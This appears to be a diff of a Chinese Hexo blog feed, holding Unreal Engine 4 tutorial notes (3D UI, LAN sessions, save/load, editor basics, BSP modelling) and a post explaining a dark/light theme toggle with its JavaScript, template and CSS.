    • 新建一个 bool 类型变量 IsFullyAutomatic,用于控制射击方式是全自动/半自动。
    • 定义一个自定义事件 FullyAutomatic_Event,用于蓝图通信以设置 IsFullyAutomatic
    • 定义一个自定义事件 EnableFullyAutomatic_Event,执行这个事件会开火,通过 Set Timer by Function Name 来实现全自动开火,Clear Timer by Function Name 来实现停止开火。
    • Press Pointer KeyRelease Pointer Key,来实现 Widget Interaction 获取到 UI 时鼠标点击事件。

    UE

    ​设置 UI 的蓝图,按下按钮时设置事件。

    UE

    ​要想纯用鼠标控制 3D UI,先自定义一个 PlayerController,应用之并将 EnableClickEvents 给我关了。

    UE

    ​编辑这个 PlayerController 的蓝图,如此绘制之,并将 Interaction Source 设为 Mouse

    UE

    ​新建一个 pawn 类,里面添上 camera 并获取控制权,运行关卡,此时 3D UI 可以正确运行。

    选看

    ###【选看】多个界面切换和局域网联机

    UE

    ​创建三个 Widget Blueprint

    • FindServer 查找服务器 UI。
    • JoinServer 显示服务器信息和加入按钮的 UI,放置在查找服务器 UI 的列表里。
    • MainMenu 主菜单 UI。

    UE

    ​创建两个第三人称关卡:

    • MainMenu 主菜单。
    • GameMap 游戏地图。

    UE

    ​设计 MainMenu 的 UI 如图所示。

    UE

    ​设置 FindServer 的 UI 如图所示,设计一个 ScrollBox 用于存放 JoinServer

    UE

    ​设置 JoinServer 的 UI 如图所示,可以加一个 Size Box 控制 UI 大小。

    UE

    ​将 JoinServer 的 UI 的显示模式设置为 Desired,调整大小至原点。

    UE

    JoinServer 下新建一个 String 类型的变量 Name,设为 publicExpose on Spawn

    UE

    ​将文字与 Name 绑定。

    UE

    JoinServer 下新建一个 Blueprint Session 类型的变量 Server,设为 publicExpose on Spawn

    UE

    ​绘制 MainMenu 下按下创建房间按钮的逻辑。

    • Create Session 是网络联机相关的内容。
    • Open Level 可以切换到名称为 GameMap 的关卡。

    UE

    GameMap 里整俩出生点。

    UE

    MainMapLevel Blueprint 显示 MainMenu 的 UI。

    UE

    ​绘制 MainMenu 下按下打开服务器按钮的逻辑——清除所有 UI,然后显示 UI FindServer

    UE

    ​绘制 MainMenu 下按下打开退出游戏的逻辑 QuitGame

    UE

    ​绘制 FindServer 下按下返回按钮的逻辑——清除所有 UI,然后显示 UI MainMenu

    UE

    FindServer 下定义一个刷新服务器事件 FreshServer_Event

    • Find Sessions 查找可用连接。
    • 如果找到可用服务器,创建 JoinServer 的 UI,设置其变量 ServerName 的值,并将其放在 Scroll Box 的子类。

    UE

    ​创建对象和按下刷新按钮时都可以触发这个事件。

    UE

    ​创建 FindServerCircularThrobberVisibility 属性的绑定。

    UE

    ​绑定的逻辑:如果 Scroll Box 下有子节点,则不显示,否则显示。

    UE

    ​运行游戏时选择 Number of Players2

    UE

    ​开跑!A 加入游戏后,B 就会显示 A 的服务器信息。

    UE

    ​编写 JoinServer 中按下加入按钮的逻辑——JoinSession 即可加入。

    UE

    ​开跑!

    ###【选看】简易版本地存档、读档系统

    UE

    ​创建两个 Widget BlueprintSaveGame_UMG(存档界面)和 SaveGameSlot(存档项)。

    UE

    SaveGameSlot 如此设计。

    UE

    ​ 给 SaveGameSlot 设计两个变量(读档时设置这两个变量),String 类型的 TextVector 类型的 Location,并且都设置 Instance EditableExpose on Spawn

    UE

    ​将 TextBlock 里的 Text 与变量 Text 绑定。

    UE

    ​绘制 SaveGameSlot 里的蓝图,按下 Load_Btn 时执行读档操作,将 Third Person CharacterLocation 设为存档里的 Location

    UE

    ​绘制 SaveGame_UMG 的 UI 界面,其中的 Scroll Box 用于存放存档信息(SaveGameSlot),让信息放不下的时候显示滚动条。

    UE

    ​创建一个 SaveGame 类,命名为 SaveGame_BP

    UE

    SaveGame_BP 里设计两个变量:String 类型的 SaveGameNameVector 类型的 PlayerLocation。并且都是数组。

    UE

    SaveGame_UMG 中将 ScrollBox 设为变量。

    UE

    ​在关卡蓝图/角色蓝图中绘制读档界面的逻辑。

    UE

    ​在关卡蓝图/角色蓝图中绘制按下 Tab 键存档的逻辑。

    UE

    ​存档位置。

    UE

    ​在关卡蓝图/角色蓝图中绘制按下 P 键显示/隐藏读档界面的逻辑。

    UE

    ​开跑!

    ]]>
    @@ -2949,7 +2949,7 @@ /posts/Latex-%E8%AE%BA%E6%96%87%E6%8E%92%E7%89%88%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/ -
    ]]>
    +
    ]]>
    @@ -3001,7 +3001,7 @@ /posts/Hexo-%E6%98%BC%E5%A4%9C%E5%88%87%E6%8D%A2/ - [data-theme='light']{.dark{display: none;}}[data-theme='dark']{.light{display: none;}}

    前言

    ​现在博客按下右边栏的昼夜切换按钮就可以白天 / 黑夜模式之间进行切换!

    昼夜切换昼夜切换

    快按它快按它快按它~

    正文

    data-theme

    ​主要原理:在 <html> 上添加变量,值为 lightdark,剩下的交给 CSS。

    ​新建一个 toogleTheme.js 用于实现这个功能。

    function getTheme(){
    if (localStorage.getItem('theme') !== null) {
    return localStorage.getItem('theme');
    }
    if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
    // 检测暗色模式
    return "dark";
    } else if (window.matchMedia && window.matchMedia('(prefers-color-scheme: light)').matches) {
    // 检测白天模式
    return "light";
    } else {
    // 用户没有设置偏好或浏览器不支持
    return "light";
    }
    }

    function setTheme() {
    document.documentElement.setAttribute('data-theme', getTheme());

    // giscus https://blog.jvav.me/posts/change-giscus-theme-at-runtime
    document.querySelectorAll("iframe.giscus-frame")?.forEach(frame => {
    frame.contentWindow.postMessage(
    {
    giscus: {
    setConfig: {
    theme: getTheme() === 'light' ? 'light' : 'dark_high_contrast',
    },
    },
    },
    "https://giscus.app"
    );
    });
    }

    function setToggleThemeButtonListener() {
    const toggleButton = document.getElementById('js-toggle_theme');
    toggleButton.addEventListener('click', toggleTheme);
    function toggleTheme() {
    localStorage.setItem('theme', getTheme() === 'light' ? 'dark' : 'light');
    setTheme();
    }
    }
    • getTheme() 获取主题。

      • 如果 localStorage.getItem('theme') 的值存在,说明用户设置过主题,使用设置的主题。

      • 查询用户系统是否存在昼夜主题偏好,若没有则使用白天主题。

    • setTheme() 设置主题。

    • setToggleThemeButtonListener() 昼夜切换按钮的监听,侧边栏创建一个按钮。

      <div class="rightside-button" id="js-toggle_theme">
      <span>
      <img no-lazy src="<%- theme.icon.toggle_theme %>" class="rightside-button-icon" alt="Icon">
      </span>
      </div>

    防止闪烁

    ​这个 setTheme() 必须放在页面渲染前执行,不然加载页面时会有昼夜切换的闪烁,影响体验。(参考:暗色模式下页面刷新或切换出现闪烁的问题 · Issue #107 · Siricee/hexo-theme-Chic (github.com)

    <!DOCTYPE html>
    <html lang=<%= theme.lang %> data-theme="light">
    <%- js('js/widget/toggleTheme.js') %>
    <script>
    setTheme();
    </script>
    <head>
    <%- partial('_partial/head') %>
    </head>

    <body>
    <%- body %>
    <%- partial('_partial/footer') %>
    </body>
    </html>

    var.css

    ​CSS 中,写好昼夜模式下的颜色变量。

    [data-theme='light'] {
    --global-bg: #fff;
    --text-primary: #333;
    --text-secondary: #757575;
    --text-link: #3c79b6;
    --background-primary: #fff;
    --background-secondary: rgba(255, 255, 255, 0.95);
    --background-tertiary: #efefef;
    --blockquote-bg: #fafafa;
    --border: #e0e2e5;
    --code-bg: #f1f5fb;
    --highlight-tools-bg: #e6ebf1;
    --highlight-tools-text: #b3b3b3;
    --tabs-bg: var(--tabs-bg);
    --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
    --tr-bg: hsla(0, 0%, 96.5%, 0.51);
    --scrollbar-color: auto;
    --hr-color: #efefef;
    }

    [data-theme='dark'] {
    --global-bg: #0d0d0d;
    --text-primary: #ddd;
    --text-secondary: #aaa;
    --text-link: #80c8f8;
    --background-primary: #1a1a1a;
    --background-secondary: rgba(0, 0, 0, 0.95);
    --background-tertiary: rgba(0, 0, 0, 0.95);
    --blockquote-bg: #2c2c2c;
    --border: #cdcdcd;
    --code-bg: #2c2c2c;
    --highlight-tools-bg: #1a1a1a;
    --highlight-tools-text: #cdcdcd;
    --tabs-bg: #2c2c2c;
    --tr-bg: rgba(0, 0, 0, 0.51);
    --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0));
    --scrollbar-color: #525252;
    --hr-color: #666;
    }

    其它

    ​从 Hexo 博客音乐播放器 Aplayer 深色模式 css 文件 | 张洪 Heo (zhheo.com) 抄一个深色模式的 Aplayer 的 css。

    ​昼夜切换的过程中,给有变色的元素添加过渡动画:transition: XXX 0.5s ease-in-out;

    ​其它的就是修图 & 乱调 CSS 了。

    ​(夜间模式看顺眼了还不习惯改回来了)

    ]]>
    + [data-theme='light']{.dark{display: none;}}[data-theme='dark']{.light{display: none;}}

    前言

    ​现在博客按下右边栏的昼夜切换按钮就可以白天 / 黑夜模式之间进行切换!

    昼夜切换昼夜切换

    快按它快按它快按它~

    正文

    data-theme

    ​主要原理:在 <html> 上添加变量,值为 lightdark,剩下的交给 CSS。

    ​新建一个 toogleTheme.js 用于实现这个功能。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    function getTheme(){
    if (localStorage.getItem('theme') !== null) {
    return localStorage.getItem('theme');
    }
    if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
    // 检测暗色模式
    return "dark";
    } else if (window.matchMedia && window.matchMedia('(prefers-color-scheme: light)').matches) {
    // 检测白天模式
    return "light";
    } else {
    // 用户没有设置偏好或浏览器不支持
    return "light";
    }
    }

    function setTheme() {
    document.documentElement.setAttribute('data-theme', getTheme());

    // giscus https://blog.jvav.me/posts/change-giscus-theme-at-runtime
    document.querySelectorAll("iframe.giscus-frame")?.forEach(frame => {
    frame.contentWindow.postMessage(
    {
    giscus: {
    setConfig: {
    theme: getTheme() === 'light' ? 'light' : 'dark_high_contrast',
    },
    },
    },
    "https://giscus.app"
    );
    });
    }

    function setToggleThemeButtonListener() {
    const toggleButton = document.getElementById('js-toggle_theme');
    toggleButton.addEventListener('click', toggleTheme);
    function toggleTheme() {
    localStorage.setItem('theme', getTheme() === 'light' ? 'dark' : 'light');
    setTheme();
    }
    }
    • getTheme() 获取主题。

      • 如果 localStorage.getItem('theme') 的值存在,说明用户设置过主题,使用设置的主题。

      • 查询用户系统是否存在昼夜主题偏好,若没有则使用白天主题。

    • setTheme() 设置主题。

    • setToggleThemeButtonListener() 昼夜切换按钮的监听,侧边栏创建一个按钮。

      1
      2
      3
      4
      5
      <div class="rightside-button" id="js-toggle_theme">
      <span>
      <img no-lazy src="<%- theme.icon.toggle_theme %>" class="rightside-button-icon" alt="Icon">
      </span>
      </div>

    防止闪烁

    ​这个 setTheme() 必须放在页面渲染前执行,不然加载页面时会有昼夜切换的闪烁,影响体验。(参考:暗色模式下页面刷新或切换出现闪烁的问题 · Issue #107 · Siricee/hexo-theme-Chic (github.com)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    <!DOCTYPE html>
    <html lang=<%= theme.lang %> data-theme="light">
    <%- js('js/widget/toggleTheme.js') %>
    <script>
    setTheme();
    </script>
    <head>
    <%- partial('_partial/head') %>
    </head>

    <body>
    <%- body %>
    <%- partial('_partial/footer') %>
    </body>
    </html>

    var.css

    ​CSS 中,写好昼夜模式下的颜色变量。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    [data-theme='light'] {
    --global-bg: #fff;
    --text-primary: #333;
    --text-secondary: #757575;
    --text-link: #3c79b6;
    --background-primary: #fff;
    --background-secondary: rgba(255, 255, 255, 0.95);
    --background-tertiary: #efefef;
    --blockquote-bg: #fafafa;
    --border: #e0e2e5;
    --code-bg: #f1f5fb;
    --highlight-tools-bg: #e6ebf1;
    --highlight-tools-text: #b3b3b3;
    --tabs-bg: var(--tabs-bg);
    --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
    --tr-bg: hsla(0, 0%, 96.5%, 0.51);
    --scrollbar-color: auto;
    --hr-color: #efefef;
    }

    [data-theme='dark'] {
    --global-bg: #0d0d0d;
    --text-primary: #ddd;
    --text-secondary: #aaa;
    --text-link: #80c8f8;
    --background-primary: #1a1a1a;
    --background-secondary: rgba(0, 0, 0, 0.95);
    --background-tertiary: rgba(0, 0, 0, 0.95);
    --blockquote-bg: #2c2c2c;
    --border: #cdcdcd;
    --code-bg: #2c2c2c;
    --highlight-tools-bg: #1a1a1a;
    --highlight-tools-text: #cdcdcd;
    --tabs-bg: #2c2c2c;
    --tr-bg: rgba(0, 0, 0, 0.51);
    --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0));
    --scrollbar-color: #525252;
    --hr-color: #666;
    }

    其它

    ​从 Hexo 博客音乐播放器 Aplayer 深色模式 css 文件 | 张洪 Heo (zhheo.com) 抄一个深色模式的 Aplayer 的 css。

    ​昼夜切换的过程中,给有变色的元素添加过渡动画:transition: XXX 0.5s ease-in-out;

    ​其它的就是修图 & 乱调 CSS 了。

    ​(夜间模式看顺眼了还不习惯改回来了)

    ]]>
    @@ -3028,7 +3028,7 @@ /posts/Software-%E8%B0%8C%E5%98%89%E8%AF%9A%20UE4%20%E6%95%99%E7%A8%8B%EF%BC%881-26%EF%BC%89/ - 资源

    课程

    选看

    ###【选看】什么是虚幻引擎、适合什么人学、支持平台、经验分享

    这系列课程能带给你什么?

    • 能够了解虚幻 4

    • 了解虚幻 4 能够制作什么

    • 能够确认自己是否适合学习虚幻 4

    • 能够获得自我学习的途径

    • 能够熟悉基本的虚幻 4 的界面操作

    • 能够搭建简单的场景

    • 能够制作简单的互动(开关门、昼夜交替)

    • 能够使用地形工具绘制地形

    • 能够制作地形材质

    • 能够了解虚幻 4 渲染特性(灯光、后期、雾)

    • 能够制作简单的 UI 界面

    • 能够制作简单的过场动画

    • 了解虚幻 4 的一些基本概念

    什么是虚幻 4?

    • 虚幻 4

      是由 Epic Games 开发的一个游戏引擎,Epic Games 是一家美国视频游戏和软件开发公司。虚幻 1 是由 TimSweeney 开发的,他同时也是 EpicGames 的创始人。于 1998 年 5 月发行。虚幻 4 从企业应用和电影体验到高品质的 PC、主机、移动、VR 及 AR 游戏,虚幻 4 能够提供从启动项目到发行产品所需的一切。世界级的工具套件以及简易的工作流程能够帮助开发者快速迭代概念并立即查看成品效果,且无需触碰一行代码。而完整公开的源代码则能让虚幻引擎 4 社区的所有成员都能够自由修改和扩展引擎功能。

    • 行业前景

      越来越多的开发者,开发商投入到虚幻 4 中,简单的说就是使用虚幻 4 的人越来越多了,许多独立游戏,大厂的游戏都在使用虚幻 4 来开发,加上虚幻 4 对开发者来说使用完全免费,所有源代码都是开源的,你只需要在发行的时候支付 5% 的费用。

    虚幻 4 都有哪些功能?

    • 实时逼真渲染

      “开箱即用”的好莱坞级视觉效果。虚幻引擎基于物理的渲染技术、高级动态阴影选项、屏幕空间反射以及光照通道等强大功能将帮助您灵活而高效地制作出令人赞叹的内容。

    • 蓝图:创作,无需代码

      有了对于设计师更加友好的蓝图可视化脚本,您无需触碰一行代码,就能快速制作出原型并推出交互内容。您可以使用蓝图构建对象行为和交互、修改用户界面、调整输入控制以及许多其他操作。您还可以使用强大的内置调试器在测试作品的同时可视化玩法流程并检查属性。

    • 包含完整的 C++ 源代码

      通过完整的 C++ 源代码,您能够学习、自定义并调试整个虚幻引擎,并毫无阻碍地发行您的产品。

    • 稳健的多人框架

      历经 20 多年的发展,虚幻引擎的多人框架已通过众多平台以及不同游戏类型的考验,制作过众多业内顶尖的多人游戏体验。虚幻引擎推出的“开箱即用”型客户端/服务器端结构不但具有扩展性,而且久经考验,能够使任何项目的多人组件“立等可用”。

    • VFX 与粒子系统

      内置的 Niagara 和级联粒子视觉效果编辑器能让您采用大量不同类型的模块,完全自定义粒子系统利用粒子光照点亮您的场景,并使用向量场构建复杂的粒子运动模拟现实情境,并制作出专业级的完美成品。

    • 灵活的材质编辑器

      虚幻引擎 4 的材质编辑器采用基于物理 PBR 的着色技术,赋予您对于角色和物体外观和感觉的空前掌控力。使用以节点为基础的直观工作流程快速创建多种经得起近距离检验的表面。像素级别的图层材质和可微调的值能让你创作出任何想要的风格。

    • 电影级后期处理效果

      虚幻引擎的后期处理能够能让您优雅地调整场景的外观和感觉。动动指尖就能轻松获得电影级的效果,包括环境立方体贴图、环境遮挡、高级泛光、颜色分级、景深、人眼适应、镜头光晕、光束、临时采样抗锯齿和色调映射等众多实用功能。

    • 包罗万象的动画套件

      通过虚幻的网格体以及动画编辑工具,您能够完全自定义角色。工具中强大的功能包括了状态机、混合空间、逆向运动学和由动作驱动的物理特性。您可以使用动画蓝图高效工作,通过即时预览动作,制作出真正的动态角色以及真实可信的动作。

    • Sequencer:专业动画

      由影视行业专家设计的 Sequencer 是款完整的非线性、实时动画编辑工具,专为多人协同工作而生,能够释放您的创作潜能。它能让您以镜头为单位逐定义和修改光照、镜头遮挡、角色以及布景。使用动画运镜和实时游戏录制创作各种不同的动态剪辑。

    • 地形与植被使用地形系统

      创建巨大的、开放的世界环境。得益于地貌系统强劲的 LOD 系统和高效的内存使用,您可以创建比过去大出几个数量级的地形。使用 LandscapeGrass 功能用不同类型的花草自动覆盖庞大的户外环境,并使用植被工具快速地绘制摆放树木、灌木、岩石及其他装饰物。

    • 专为 VR、AR 及 MR (XR) 而生

      得益于 Epic 与全球顶尖的硬件及软件厂商间紧密的合作,虚幻引警能为虚拟现实 (VR)、增强现实 (AR) 及混合现实 (MR) 体验的创作者提供最高品质的解决方案。通过与最流行的各大平台实现本地集成,以及前向渲染、多采样抗锯齿 (MSAA) 以及实例化双目绘制以及单视场远景渲染等优化手段,UE4 能够在无损性能的前提下制作出高品质的成果。

    • 先进的人工智能

      通过虚幻引擎 4 的游戏框架及人工智能系统,可赋予 AI 控制角色对周围世界更好的空间意识,同时使他们能够更智能地行动。随着您不断移动对象,动态导航网格体会实时更新,以获得最佳路径。

    虚幻 4 适合什么人学?

    • 爱玩游戏的
      可能平时爱玩游戏,总想做一个自己的游戏,可以自己主导整个游戏剧情,玩法,以做游戏为业余爱好的朋友
    • Unity 转行的
      可能刚刚由于种种原因,转行做 UE4 的朋友
    • 有代码基础的
      可能之前学习过代码 (PHP、JAVA、C++),并对 UE4、做游戏有强烈热情的朋友
    • 大学期间有空闲时间的如果你还在迷茫,不知以后干嘛,可能学习虚幻 4 是一个不错的选择以兴趣爱好出发,总会有意想不到的收获!
    • 室内设计的(美术方向)虚幻 4 对于美术方面也是非常友好的,熟悉参数后就能调整到不错的画面,加上蓝图不需要任何代码,就可以实现一些简单的互动。
    • 更多…

    虚幻 4 支持的平台

    ​虚幻 4 还有很多插件,方便其他软件的用户使用,如 Vray,3dsmax,Speed tree,True sky。以及很多硬件厂商都有对应的 SDK 支持。

    虚幻 4 制作的游戏

    ​堡垒之夜、绝地求生、往日不在、方舟、SCUM、叛乱 2.沙漠风暴……

    分享自己的学习之路

    要点:

    1. 兴趣、热情
    2. 做一个自己想做的游戏
    3. 成就感
    4. 动力
    5. 能够独立解决问题
    6. 遇到问题能够快速的查阅相关资料
    7. 钻研精神

    你们可能会问的问题

    ​问:学习虚幻 4,一定要学 C++ 吗?

    ​答:肯定的,就程序这条路而言,从一个初级虚幻 4 工程师到中级甚至是高级工程师,C++ 熟练掌握是必须的,入门可以先从蓝图开始。

    ​问:学习虚幻 4 需要什么配置的电脑?

    ​答:首先最好使用英伟达的游戏系的显卡,虚幻 4 对配置要求还是蛮高的,如果预算有限,刚刚入门的朋友,就我经验而言,可以差不多买个五六千的组装机就可以了。

    ​CPU: i7-7700、显卡: GTX1060、内存: 8g、固态 128g(这是我能接受的最低配置,上不封顶)

    ​问:我没有代码基础基础或者转行过来的,容易学吗?好上手吗?

    ​答:虚幻 4 上手入门不难,学精就难了,所以一开始可以抱着玩游戏的心态(也就是兴趣,不是随便玩一玩的意思)。况且虚幻 4 有蓝图(不需要写任何代码),无论你是学习程序,还是美术,都可以在一开始实现一些简单的功能,做一些简单的游戏,增加你的成就感!

    ​问:学习虚幻 4 是否要学报英语培训课?(是否要学英文)

    ​答:不一定,但是能够同时进行是最好的,毕竟虚幻 4 很多功能选项还是英文的,不过随着版本的不断更新,汉化的力度越来越强大,我现在学习有时候都是用英文版本的,再开一个中文版本的作为翻译。

    ###【选看】学习虚幻引擎的 15 个途径

    ###【选看】虚幻引擎版本选择

    ​4.24

    ###【选看】虚幻引擎全流程安装

    1. 注册和登录 EpicGames 账号
    2. 下载和安装 Epicgames 启动器
    3. 使用和介绍 EpicGames 启动器
    4. 安装虚幻引擎

    ###【选看】新版本下载流程、更改缓存路径

    更改缓存路径

    ​ 将 安装盘:\Program Files\Epic Games\UE_4.24\Engine\Config\BaseEngine.ini

    DeleteUnused=true, UnusedFileAge=34, FoldersToClean=-1, Path="%ENGINEVERSIONAGNOSTICUSERDIR%DerivedDataCache", EditorOverrideSetting=LocalDerivedDataCache)

    中的 Path="%ENGINEVERSIONAGNOSTICUSERDIR%DerivedDataCache"改为:Path="%GAMEDIR%DerivedDataCache"

    ​如此做,项目的缓存路径就会在项目的根目录创建,以减少 C 盘占用空间。

    ###【选看】虚幻 4 闪退原因汇总

    ###【选看】虚幻 4 免费素材渠道汇总

    • 虚幻商城

    虚幻商城

    基础

    ###【基础】01 课:创建项目全流程和模板试玩

    ​打开 Unreal4.22,创建项目:

    创建项目

    创建项目


    虚幻 4 工程文件夹的结构:

    • Config:包含了项目设置,键盘输入之类的配置文件
    • Content:存放引擎或游戏的内容,包括地图、贴图、模型、材质、蓝图等
    • Intermediate:包含了在编译引擎或游戏时生成的临时文件
    • Saved:包含了自动保存内容,配置 (*.ini) 文件以及日志文件
    • uproject:项目启动程序,开启我们的项目

    【基础】02-1 课:超详细编辑界面介绍

    ​介绍虚幻 4 的界面,跟 Unity 的差不多,有些没接触过的:

    ​视图界面:

    视图界面

    ​书签可以保存 / 读取特定的视口。

    视图界面

    ​视图模式显示某些内容或是辅助信息。

    【基础】02-2 课:视口导航(在视口界面移动视角)

    ​不同于其他三维应用程序(聚焦和围绕一个正在构建的资源),虚拟引擎视口移动功能按键专门用于对大型游戏关卡进行布景,其中快速穿越大范围区域的功能非常关键。

    功能按钮操作
    左键单击 + 拖动前后移动视口摄像机和左右旋转视口摄像机。
    右键单击 + 拖动旋转视口摄像机,不前后移动。
    左单击 + 右单击 + 拖动 / 滚轮单击 + 拖动在世界场景中上下移动视口摄像机。
    Ctrl + Alt + 单击 + 拖动创建方形选取框。
    按住鼠标右键 + WASD 键像在典型的第一人称射击游戏中那样导航关卡。
    F 键将视口摄像机聚焦到视口中选中的 Actor 上。
    AIt + 鼠标左键 + 拖动围绕单个的支点或兴趣点翻转视口。
    Alt + 鼠标右键 + 拖动向前推动摄像机使其接近或远离单个支点或兴趣点。
    Alt + 中键单击 + 拖动根据鼠标移动的方向将摄像机向左、右、上、下移动。

    【基础】03 课:物体编辑(坐标系、变换、单位)

    变换

    ​选中对象,R 移动,W 旋转,E 缩放。

    ​设置局部坐标系 / 全局坐标系。

    全局 / 局部

    单位和度量

    • 默认情况下,1 个虚幻单位(uu)等于现实世界的 1 厘米(cm)。这是一个要注意的重要细节,你应将其应用于设计和游戏的所有方面,以开发出相应的环境、角色、效果等。
    • 默认情况下,玩家通常在游戏世界场景中高约 6 英尺:相当于 180 厘米,或 180 uu。为了满足项目的需要,你可以更改此默认值。但无论默认值是什么,你都可以将其用作基值来为所有其他 Actor 的大小建立情境。

    枢轴偏移

    • 中键 选中物体中心再拖动,右键可以设置该对象的中心(枢轴偏移):

    设置枢轴偏移

    框选

    • Ctrl + Alt + 左键 可以进行框选。

    复制

    • 选中对象,Alt + 左键 可以复制对象。

    【基础】04 课:导入资源、项目迁移和管理

    一些最常用的文件类型和资源类型以及相关的应用程序

    资源类型文件扩展名应用程序
    三维模型、骨架网格体结构、动画数据.fbx、.objMaya、3ds Max、ZBrush
    纹理和图片.bmp、.jpg、.pcx、.png、.psd、.tga、hdrPhotoshop
    字体.otf、 . ttfBitFontMaker2
    音频.wavAudacity、 Audition
    视频和多媒体.wmvAfter Effects、Media Encoder
    PhysX(物理类).apb、.apxAPEX PhysX Lab
    其它.csvExcel

    ​许多资源不是导入的,而是直接在编辑器中创建的。
    ​常见示例:

    • 蓝图类
    • 粒子系统
    • 材质和材质实例

    ​选择某个资源,打开引用查看器可以查看这个资源与哪些其它资源绑定。

    引用查看器

    ​导入 / 导出资源最好使用虚幻引擎的迁移功能,使用复制粘贴有可能导致一些兼容性问题。

    迁移

    【基础】05-1 课:主流三维软件模型导入虚幻 4

    ​对于一些主流的三维建模软件(3ds max、C4D),可以使用 Datasmith 插件将模型导入到虚幻引擎中。

    ​对于 Maya,有 Maya Live Link 这个插件。

    Maya Live Link

    fbx 格式和 obj 格式的共同点:
    它们都是三维通用模型格式,都支持三个点以上的面,都可以用在目前几乎所有主流的三维软件中。
    fbx 格式和 obj 格式的大致区别:
    fbx 中包含动画、材质特性、贴图、骨骼动画、灯光、摄像机等信息0B]中不包含动画、材质特性、贴图路径、动力学、粒子等信息。
    abc 格式:
    中文名称:蒸馏机 支持动画、粒子等!bake 三维场景的模型、流体、动画、特效等数据。

    传统文件格式的导入:

    导入 fbx

    ​emmm 感觉一个比较有用的是 合并网格体,其它随意。

    戴珍珠耳环的少女

    ​试了下导入之前建的模型,眼睛应该是建模的时候没设好材质……其它 OK。

    【基础】05-2 课:Datasmith 插件使用全流程

    ​给 3ds Max、C4D 安装这个插件,这样导出文件的时候就会多一个 Datasmith 文件格式的选项,这样一些材质参数就能够被虚幻引擎所识别。

    4.24 的 datasmith 插件是内置到虚幻引擎中了
    但是 4.24 以下的版本并没有
    需要在虚幻商城中搜索 datasmith
    然后选择 unreal datasmith 插件安装到对应的版本中即可~

    【基础】06-1 课:BSP 画刷的概述和使用方法

    什么是 BSP(画刷)?

    1. BSP (Binary Space Partitioning(二进制空间分区))
      在虚幻引擎 4 中有很多不同的方法可以创建、编辑场景中的几何体。通常意义下,相对于直接创建几何体而言,使用静态网格体是比较好的做法(性能上较优秀)。同时,由于静态网格体要求在引擎外部的 3D 建模软件中创建,因此可以使用引擎的几何体编辑工具快速的为游戏原型来搭建场景。

      所以就有了 BSP(画刷)工具,能够帮助你们在虚幻引擎快速的搭建一些基本的模型!

    2. 另外一个解读
      BSP 画刷是虚幻的关卡构建中最为基本的工具。从理论上说,最好将 BSP 想象为可以在关卡中进行填充并切除空间体积的东西。很久之前,BSP 被用来作为关卡设计中的主要构建模块。但是现在,这个角色由静态网格物体来承担,相较而言,静态网格物体远为高效,不过,作为关卡和物体的快速原型化产品的前期应用:以及对于那些无法使用 3D 建模工具而需要进行关卡构建的人来说,BSP 依然很有用。

    ​就是用虚幻引擎实现一些简单的建模功能。

    BSP 画刷的用途

    1. 粗略画出关卡

      开发关卡的标准工作流程是这样的:

      • 设计出关卡草图及关卡路径。
      • 运行关卡测试流程和游戏性。
      • 修改布局并反复测试。
      • 起始的网格物体环节。
      • 起始的光照环节。
      • 对碰撞及性能问题的游戏测试。
      • 润色。
    2. 简单过滤器几何体

      通常,在关卡设计师制作他们的关卡过程中,他们会突然想出一个情形,其中他们需要一个非常简单的一块几何体来填充空隙或空问。如果没有静态网格物体填充空间,不需要麻烦美术组负责创建一个自定义网格物体,设计师只需使用 BSP 就可以填充这个空问。尽管静态网格物体在性能方面更好,但是只要几何体简单,就可在不造成任何严重影响的情况下可以偶尔使用 BSP。

    BSP 画刷工具的使用

    BSP 模式

    ​感觉要比 Unity 里的要更高级一点……

    选择多个面

    ​细节面板里可以选择多个面,把材质拖上去以应用材质。

    【基础】06-2 课:房子搭建全流程

    ​内容浏览器下新建一个关卡,一片漆黑……往场景添加:定向光源、天空光照、天空大气、体积云、指数级高度雾。

    新建关卡

    ​内容浏览器下 添加功能或内容包…,导入 第三人称游戏 素材包。

    导入人物

    内容/ThirdPersonBP/Blueprints/ThirdPersonCharacter.uasset 拖入场景, 细节中搜索 poss,将 Pawn 下的 自动控制玩家 设为 玩家0,此时运行关卡就会以第三人称小人的形式。

    设置玩家控制权

    创建立方体

    ​使用 BSP 创建立方体作房屋主体,注意是在几何体里而不是基础里。

    Brush Settings 设置好对应的 XYZ(而不是缩放,这会导致材质问题)。

    ​设置好 中空墙壁厚度

    中空的门

    ​设置一个 Subtractive 类型的立方体作门,如果把地面也挖了,在地面的 Brush Settings 设置好排序。

    楼梯

    ​挖楼梯。

    内饰

    ​从 内容/StarterContent/ 里选取对应的素材,一阵操作。

    内饰

    ​玻璃房里可以添加 球体反射采集,增加真实性。

    打包

    ​将所有的 BSP 画出来的东西打包成一个静态网络体。

    【基础】06-3 课:静态网格模型碰撞设置

    设置碰撞体

    ​双击某个静态网络体,可以设置碰撞器(类似 Untiy 的 Mesh Colider?)

    设置碰撞体

    ​这个椅子可以从细节面板的 静态网络体 里设置碰撞。

    设置碰撞体

    ​此法设置碰撞体类似于 Unity 里的 Box Colider。

    【基础】06-4 课:合并 Actor(合并静态网格体)

    合并静态网络体

